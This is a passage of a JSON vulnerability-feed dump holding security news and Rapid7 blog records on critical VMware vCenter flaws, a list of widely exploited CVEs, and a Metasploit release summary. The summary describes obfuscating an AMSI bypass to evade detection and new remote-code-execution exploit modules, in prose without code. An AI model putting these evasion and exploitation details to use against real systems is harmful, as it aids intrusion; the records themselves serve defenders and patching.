Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-05T10:58:00", "type": "thn", "title": "ALERT: Critical RCE Bug in VMware vCenter Server Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-06-07T05:04:26", "id": "THN:71D3B9379166BDEEAEC59EE5E145C193", "href": "https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "[](<https://thehackernews.com/images/-2U1OlLKowHE/YK3TqGgtBNI/AAAAAAAACoM/YQnmtOrG8sE0U4uZpTIs7KcB1_8zxwSHwCLcBGAsYHQ/s0/vmware-patch-update.jpg>)\n\nVMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server.\n\nTracked as 
CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN ([vSAN](<https://docs.vmware.com/en/VMware-vSphere/6.5/com.vmware.vsphere.virtualsan.doc/GUID-9504EECF-5946-49FB-86C6-8A4F977F5FC3.html>)) Health Check plug-in, which is enabled by default in the vCenter Server. \"A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\" VMware [said](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>) in its advisory.\n\nVMware vCenter Server is a server management utility that's used to control virtual machines, ESXi hosts, and other dependent components from a single centralized location. The flaw affects vCenter Server versions 6.5, 6.7, and 7.0 and Cloud Foundation versions 3.x and 4.x. VMware credited Ricter Z of 360 Noah Lab for reporting the vulnerability.\n\nThe patch release also rectifies an authentication issue in the vSphere Client that affects Virtual SAN Health Check, Site Recovery, vSphere Lifecycle Manager, and VMware Cloud Director Availability plug-ins (CVE-2021-21986, CVSS score: 6.5), thereby allowing an attacker to carry out actions permitted by the plug-ins without any authentication.\n\n[](<https://thehackernews.com/images/-kzpGHkhfj6Q/YK3UvKUogTI/AAAAAAAACoU/VakKsSNT1o0mW1nT7BAG4vIk6F0yREY0QCLcBGAsYHQ/s0/vmware.jpg>)\n\nWhile VMware is strongly recommending customers to apply the \"[emergency change](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>),\" the company has published a [workaround](<https://kb.vmware.com/s/article/83829>) to set the plug-ins as incompatible. \"Disablement of these plug-ins will result in a loss of management and monitoring capabilities provided by the plug-ins,\" the company noted.\n\n\"Organizations who have placed their vCenter Servers on networks that are directly accessible from the Internet [...] 
should audit their systems for compromise,\" VMware [added](<https://core.vmware.com/resource/vmsa-2021-0010-faq>). \"They should also take steps to implement more perimeter security controls (firewalls, ACLs, etc.) on the management interfaces of their infrastructure.\"\n\nCVE-2021-21985 is the second critical vulnerability that VMware has rectified in the vCenter Server. Earlier this February, it resolved a remote code execution vulnerability in a vCenter Server plug-in ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that could be abused to run commands with unrestricted privileges on the underlying operating system hosting the server.\n\nThe fixes for the vCenter flaws also come after the company patched another critical remote code execution bug in VMware vRealize Business for Cloud ([CVE-2021-21984](<https://www.vmware.com/security/advisories/VMSA-2021-0007.html>), CVSS score: 9.8) due to an unauthorized endpoint that could be exploited by a malicious actor with network access to run arbitrary code on the appliance.\n\nPreviously, VMware had rolled out updates to [remediate multiple flaws](<https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html>) in VMware Carbon Black Cloud Workload and vRealize Operations Manager solutions.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T04:57:00", "type": "thn", "title": "Critical RCE Vulnerability Found in VMware vCenter Server \u2014 Patch Now!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21984", "CVE-2021-21985", "CVE-2021-21986"], "modified": "2021-05-26T04:57:58", "id": "THN:4F010A66018968CA6DAA0432C00DAE10", "href": "https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. 
issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - 
MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and 
[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] 
puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", 
"CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-06-05T16:53:27", "description": "\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server (6.5, 6.7, and 7.0) and VMware Cloud Foundation (3.x and 4.x). The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nWhile there are no reports of exploitation in the wild as of May 26, 2021, defenders may remember that CVE-2021-21972, another critical vCenter Server vulnerability from earlier this year, saw widespread exploitation within a few days of disclosure. It is likely that this latest severe flaw will follow suit, and we strongly recommend patching on an emergency basis, particularly given the increased prevalence of ransomware (whose operators often already have access to corporate networks via phished, leaked, reused, or otherwise stolen credentials). **Edit June 5, 2021:** Exploitation is now occurring in the wild. 
See AttackerKB for [full technical analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>).\n\nRapid7 Labs identified roughly 6,000 instances of vCenter Server exposed to the public internet as of May 26, 2021:\n\n\n\n## Recommendations\n\nVMware has a number of resources available for vCenter Server customers looking to understand and address CVE-2021-21985 and other vulnerabilities in this week\u2019s advisory, including a [blog post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>) and a [supplemental FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>).\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](<https://kb.vmware.com/s/article/83829>). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\nFor [further technical information of CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>), as well as community assessments of exploitability and attacker value, see AttackerKB. 
We'll update this blog post with more information as it becomes available.\n\n**Update June 5, 2021:** Multiple community sources have confirmed CVE-2021-21985 is [being exploited in the wild](<https://twitter.com/GossiTheDog/status/1400868390726733831>).", "cvss3": {}, "published": "2021-05-26T18:57:20", "type": "rapid7blog", "title": "CVE-2021-21985: What you need to know about the latest critical vCenter Server vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T18:57:20", "id": "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "href": "https://blog.rapid7.com/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:56:11", "description": "## Eternal Blue improvements\n\n\n\nPrior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate `ms17_010_eternalblue_win8` Python module would target Windows 8 and above.\n\nNow Metasploit provides a single Ruby exploit module `exploits/windows/smb/ms17_010_eternalblue.rb` which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.\n\n## AmSi 0BfuSc@t!on\n\nThe Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such [technique is integrated](<https://github.com/rapid7/rex-powershell/blob/335b0eb2e32625d12fd58a1b1a569b0068ddb435/lib/rex/powershell/psh_methods.rb#L93>) directly into Metasploit, the stub itself is identified as malicious. 
A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as `amsiInitFailed` as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting `Powershell::prepend_protections_bypass` to false.\n\n## VMware vCenter Server RCE\n\nOur very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). 
For testing in your own lab environment, full details are in the [module documentation](<https://github.com/rapid7/metasploit-framework/blob/843a7242f4e9a5a868ff26d09428763b643933cc/documentation/modules/exploit/linux/http/vmware_vcenter_vsan_health_rce.md>).\n\n## New module content (4)\n\n * [VMware vCenter Server Virtual SAN Health Check Plugin RCE](<https://github.com/rapid7/metasploit-framework/pull/15383>) by wvu and Ricter Z, which exploits [CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog>) \\- A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin's ProxygenController class to execute code as the vsphere-ui user.\n * [Polkit D-Bus Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/15368>) by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits [CVE-2021-3560](<https://attackerkb.com/topics/Jcs7hHRUxg/cve-2021-3560?referrer=blog>) \\- A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with `root` permissions, which can then be used to gain a shell as `root`. 
Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain an SSH session first before exploiting this vulnerability.\n * [ForgeRock / OpenAM Jato Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15386>) by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits [CVE-2021-35464](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464?referrer=blog>) \\- A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability \nin OpenAM and ForgeRock AM. Successful exploitation allows for remote code execution as the user running the OpenAM service.\n * [Windows Process Memory Dump](<https://github.com/rapid7/metasploit-framework/pull/15154>) by smashery - This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and deletes the temporary file on the target.\n\n## Enhancements and features\n\n * [#15217](<https://github.com/rapid7/metasploit-framework/pull/15217>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Removes the Python module `ms17_010_eternalblue_win8.py` and consolidates the functionality into `exploits/windows/smb/ms17_010_eternalblue.rb` \\- which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. 
This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.\n * [#15254](<https://github.com/rapid7/metasploit-framework/pull/15254>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This updates the AMSI bypass used by modules executing Powershell code to be randomized, making it more difficult to be detected using static signatures.\n\n## Bugs fixed\n\n * [#15362](<https://github.com/rapid7/metasploit-framework/pull/15362>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fixes a regression issue with `post/multi/manage/shell_to_meterpreter`, and other interactions with command shell based sessions\n * [#15420](<https://github.com/rapid7/metasploit-framework/pull/15420>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue where `auxiliary/scanner/ssh/eaton_xpert_backdoor` failed to load correctly\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-07-08T16%3A19%3A37%2B01%3A00..2021-07-15T10%3A18%3A50%2B01%3A00%22>)\n * [Full diff 6.0.52...6.0.53](<https://github.com/rapid7/metasploit-framework/compare/6.0.52...6.0.53>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-16T19:47:06", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985", "CVE-2021-35464", "CVE-2021-3560"], "modified": "2021-07-16T19:47:06", "id": "RAPID7BLOG:8495B2B62A16EF7A1217077330A344B3", "href": "https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-04T19:05:10", "description": "\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which 
includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). 
Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. 
\n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, 
